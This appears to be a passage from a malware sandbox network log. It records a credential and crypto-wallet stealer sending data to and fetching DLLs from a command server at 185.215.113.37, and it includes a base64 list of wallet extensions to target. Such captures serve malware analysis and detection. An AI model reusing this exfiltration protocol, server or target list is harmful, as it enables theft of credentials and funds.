TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 2, 2024 18:19:18.214998007 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Oct 2, 2024 18:19:18.215034962 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Oct 2, 2024 18:19:18.215069056 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Oct 2, 2024 18:19:18.215102911 CEST	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Oct 2, 2024 18:19:18.215138912 CEST	672	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Oct 2, 2024 18:19:18.215236902 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Oct 2, 2024 18:19:18.215430975 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Oct 2, 2024 18:19:18.254127979 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"fplugins------JDHCBAEHJJJKKFIDGHJE--
Oct 2, 2024 18:19:18.487371922 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 2, 2024 18:19:18.503730059 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK Host: 185.215.113.37 Content-Length: 6899 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 18:19:18.503766060 CEST	6899	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 2, 2024 18:19:19.258532047 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:19.453217030 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:19.691430092 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 2, 2024 18:19:19.691447973 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 2, 2024 18:19:21.187766075 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGII Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 18:19:22.084887981 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:22.171125889 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 18:19:23.032016039 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:23.051656008 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file"------HCAAEGIJKEGHIDGCBAEB--
Oct 2, 2024 18:19:23.996963978 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:24.369674921 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="file"------GIEHIDHJDBFIIECAKECB--
Oct 2, 2024 18:19:25.114274979 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:25.922548056 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:26.153538942 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:26 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 2, 2024 18:19:27.071958065 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:27.498253107 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:27 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 2, 2024 18:19:27.727266073 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:27.969285011 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:27 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 2, 2024 18:19:29.225033998 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:29.455645084 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:29 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 